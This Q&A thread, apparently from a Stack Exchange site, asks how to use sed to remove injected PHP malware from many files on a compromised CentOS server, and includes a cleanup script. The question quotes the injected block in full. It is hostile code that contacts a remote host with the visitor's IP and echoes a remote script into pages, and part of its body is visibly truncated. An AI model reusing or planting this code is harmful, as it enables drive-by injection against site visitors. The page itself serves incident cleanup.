How do I use the SED command to remove injected code from multiple files?
One of the domains on my CentOS 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.
I understand the sed command will help me rid the files of the code, but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):
<?php
#7968e7#
if (empty($ywf)) {
    error_reporting(0);
    @ini_set('display_errors', 0);
    if (!function_exists('__url_get_contents')) {
        function __url_get_contents($remote_url, $timeout) {
            if (function_exists('curl_exec')) {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
                curl_close($ch);
            } elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                $ctx = @stream_context_create(array('http' =>
                    array(
                        'timeout' => $timeout,
                    )
                ));
                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
                $handle = @fopen($remote_url, "r");
                $_url_get_contents_data = @stream_get_contents($handle);
            } else {
                $_url_get_contents_data = __file_get_url_contents($remote_url);
            }
            return $_url_get_contents_data;
        }
    }
    if (!function_exists('__file_get_url_contents')) {
        function __file_get_url_contents($remote_url) {
            $len_written != strlen($request)) {
                // Error sending request
                return FALSE;
            }
            $response = "";
            while (!@feof($socket) &&
                ($buf = @fread($socket, 4096)) !== FALSE) {
                $response .= $buf;
            }
            if ($buf === FALSE) {
                // Error reading response
                return FALSE;
            }
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
        }
    }
    if (empty($__var_to_echo) && empty($remote_domain)) {
        $_ip = $_SERVER['REMOTE_ADDR'];
        $ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
        $ywf = __url_get_contents($ywf."?a=$_ip", 1);
        if (strpos($ywf, 'http://') === 0) {
            $__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
            echo $__var_to_echo;
        }
    }
}
#/7968e7#
?>
<?php
?>
It is quite a large block of code, so I'm wondering how I can go about removing it from the many infected files. There are JavaScript files infected with code as well, but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the JavaScript files.
sed
edited May 2 '14 at 16:12 by Braiam
asked May 2 '14 at 15:52 by user3596738
Please see also serverfault.com/questions/218005/…
– derobert
May 2 '14 at 16:17
It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it.
– daniel kullmann
May 5 '14 at 13:35
1 Answer
First do a backup.
This will remove the lines between the tags #7968e7# and #/7968e7#; the original file will be kept with a .bkp extension, but it's better if you have a backup.
sed -i.bkp '/#7968e7#/,/#\/7968e7#/ d' filename
It will leave empty php blocks.
<?php
?>
<?php
?>
edited May 2 '14 at 22:12
answered May 2 '14 at 16:07 by Emmanuel
Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)
– user3596738
May 2 '14 at 20:13
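A worked version of the answer's approach, added here as an example and not part of the original answer, that also covers the two points raised in the comment above: the hex id inside the markers differs per file, and the cleanup has to run over a whole directory tree. It assumes GNU sed (the one CentOS 6 ships), that every marker has the form #<six hex digits># on its own line with a matching #/<six hex digits># closing line, and that, as the answer shows, the deletion leaves an empty "<?php" / "?>" pair behind. The sample tree, file names and contents are constructed for the demonstration; the closing marker's slash is escaped as \/ because an unescaped slash would end the sed address early. The .bkp copies sed leaves are only a convenience for comparing before and after; they are not a substitute for a full backup of public_html taken before anything is touched.

```shell
#!/bin/sh
# Added example, not from the original post. Removes a marker-delimited
# injected block from every .php file under a directory, keeps a .bkp copy
# of each edited file, drops the empty php block the deletion leaves behind,
# and verifies that no marker remains. Assumes GNU sed.

# Assumption (not from the page): the id between the '#' signs is six hex
# digits that differ from file to file, so match any six rather than one value.
MARK_OPEN='#[0-9a-f]\{6\}#'
MARK_CLOSE='#\/[0-9a-f]\{6\}#'

# Constructed sample tree: two infected files with different ids, one clean file.
make_sample() {
    dir=$1
    mkdir -p "$dir/sub"
    printf '<?php\n#7968e7#\nif (empty($ywf)) {\n  echo "injected";\n}\n#/7968e7#\n?>\n<?php\necho "app one";\n?>\n' > "$dir/index.php"
    printf '<?php\n#a1b2c3#\necho "other id";\n#/a1b2c3#\n?>\n<?php\necho "app two";\n?>\n' > "$dir/sub/page.php"
    printf '<?php\necho "clean";\n?>\n' > "$dir/sub/clean.php"
}

# Step 1: delete from the opening marker line through the closing marker line,
# inclusive, in every .php file below the directory; sed keeps name.php.bkp.
clean_tree() {
    find "$1" -type f -name '*.php' -exec \
        sed -i.bkp "/$MARK_OPEN/,/$MARK_CLOSE/d" {} +
}

# Step 2: the deletion leaves '<?php' immediately followed by '?>'. Append the
# next line to every '<?php' line (N) and delete the pair when it is empty;
# a '<?php' followed by real code does not match and is printed unchanged.
drop_empty_blocks() {
    find "$1" -type f -name '*.php' -exec \
        sed -i '/^<?php$/{N;/^<?php\n?>$/d;}' {} +
}

# Step 3: verification. Prints the number of .php files that still contain an
# opening marker; 0 means the tree is clean (the .bkp copies are not scanned).
remaining_infected() {
    grep -rl --include='*.php' "$MARK_OPEN" "$1" | wc -l | tr -d ' '
}

# Usage on a real tree (after a full backup of public_html):
#   clean_tree /path/to/public_html
#   drop_empty_blocks /path/to/public_html
#   remaining_infected /path/to/public_html   # expect 0
```

Run remaining_infected before and after clean_tree; the count should go from the number of detected files to 0, and a diff of each file against its .bkp copy should show nothing but the removed block. If a file still counts as infected afterwards, its markers do not match the assumed six-hex-digit form, and the two MARK_ patterns need adjusting to what that file actually contains rather than the deletion being forced.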